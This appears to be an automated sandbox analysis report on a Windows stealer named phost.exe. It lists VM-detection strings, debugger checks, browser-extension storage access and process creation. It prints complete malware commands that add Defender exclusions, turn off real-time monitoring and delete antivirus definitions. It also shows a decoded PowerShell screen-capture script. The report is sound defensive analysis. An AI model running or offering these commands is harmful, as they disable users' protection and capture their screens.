              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\Jump to behavior
              Source: getmac.exe, 0000004D.00000002.1884181048.000001BC4BD03000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxservice
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 0000004D.00000003.1881424686.000001BC4BD1E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000002.1884181048.000001BC4BD20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: getmac.exe, 0000004D.00000002.1884181048.000001BC4BD03000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage"
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4B3Wxx0rgMCAzCsXgKTZy0nHl5Rf6BHcDGHT/VUQ/AwsA7FoyUmM95RZe0newB3P1x0/hrOweCqclJXfeVmX95HdwNXfM9WDBNXweEq8lJffeXm39ZIfwdabMNaZB9VRBtWA7FsLgKPZyzn3k5Nf2xGcnFHTjFSQbkNQvBqMlJTfeUmH9pHcQ+RIqiFTnAopFZaXihFcvEiyox0NBaKZmyncoB3KhITZM9CAfHsvF6bnSGockJHfeRmX85GZw9OMQtOYA9SJu0jSwA3gsw0gsw1TsA5AAIAAIAMzBAAEYAdmFmcjVmbp1EbhVGdT5iclJmYhJ3Rr5WYsJ0G6BAACMrcAAAAwIHIgACIgACIAAAAHMHAAAwryBAABcjczhGdhBFdmFmcjVmbp1mDafmbp1WYvJ3BaXGbpZ2byBlclNXdLoNa0FGUvRVZ2F2cKoNAAEgvydQKAAAAaKHAAIAoyBAABwocAAQATKHAAEgkyBAABEpcAAQAkJHAAIAZyBAAAoocAAgAXKHAAAA5yBAAA8qcAAAAJKHAAAgfyBAAA0ncAAAAkIHAAAACyFRKAAAAtKHAAEwjyRlbvlGbkFmQHoNAAIw2y1WdpRWYsFGUIodK05WZ05WSoASZzlmUNoHAAIg2yVmcvR3UgQnZvN3byNWaN9gezJXZrFWZyJEdhVGaD1g2AAgAZLHAAIA2yJ3blRXZNZg2yVGa0FWZGdg2yVGaj5WdhxEVJotch5WdMVg205WZ05WSGotDpQnbllGbDBibvlGbkFmQOo3QNlHbvBlBaDXdvJ3Zt0WdpRWYsFGcOoHd4RnLzRHbhhgelNXaSRg2u92cq5SZy9Gdz9Fdm92cvJ3Yp12XzRnb192YjF2XyVGaj5WdhxmJ652bzpmLzRnb192YjF2XyV2ahVmciRXYlh2Yao3b29mbuMHdsFWC6Vmbpx2b29mTIoNdmFGdjVmbp1mLKonbvNnauMHdsFWC6o
              Source: phost.exe, 00000001.00000003.1837339893.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2171558185.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702435717.000001AE1D5F8000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1702994368.000001AE1D630000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1703035642.000001AE1D608000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1857854012.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2174353903.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1881310006.000001AE1D604000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178106775.000001AE1D607000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1830725428.000001AE1D600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000014.00000002.2944454320.000001E22842B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmsrvc
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmware
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f8vmusrvc
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: d2qemu-ga
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: phost.exe, 00000001.00000003.1888003274.000001AE1D892000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1886265486.000001AE1D730000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2170059092.000001AE1D721000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000003.2172658215.000001AE1D876000.00000004.00000020.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2178359191.000001AE1D730000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: fecodevmsrvc
              Source: getmac.exe, 0000004D.00000002.1884181048.000001BC4BD03000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAWrkProtocolRSVP
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBF0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: qemu-ga
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
              Source: getmac.exe, 0000004D.00000003.1881424686.000001BC4BD1E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000002.1884181048.000001BC4BD20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmwareservicer_
              Source: phost.exe, 00000001.00000002.2179183258.000001AE1DBF0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmp, phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmusrvc
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmware)
              Source: getmac.exe, 0000004D.00000003.1881424686.000001BC4BD1E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000003.1880936509.000001BC4BCDB000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 0000004D.00000002.1884181048.000001BC4BD20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: phost.exe, 00000001.00000003.1701309870.000001AE1D264000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: phost.exe, 00000001.00000002.2177632579.000001AE1D3A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareservice
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC8A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62CC8A684
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC934F0 GetProcessHeap,0_2_00007FF62CC934F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC8A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62CC8A684
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF62CC7C910
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF62CC7D19C
              Source: C:\Users\user\Desktop\phost.exeCode function: 0_2_00007FF62CC7D37C SetUnhandledExceptionFilter,0_2_00007FF62CC7D37C
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC8A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00007FF62CC8A684
              Source: C:\Users\user\Desktop\phost.exeCode function: 1_2_00007FF62CC7C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF62CC7C910
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD14C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,105_2_00007FF6BBD14C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD0B52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,105_2_00007FF6BBD0B52C
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD0B6D8 SetUnhandledExceptionFilter,105_2_00007FF6BBD0B6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exeCode function: 105_2_00007FF6BBD0A66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,105_2_00007FF6BBD0A66C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\phost.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\phost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
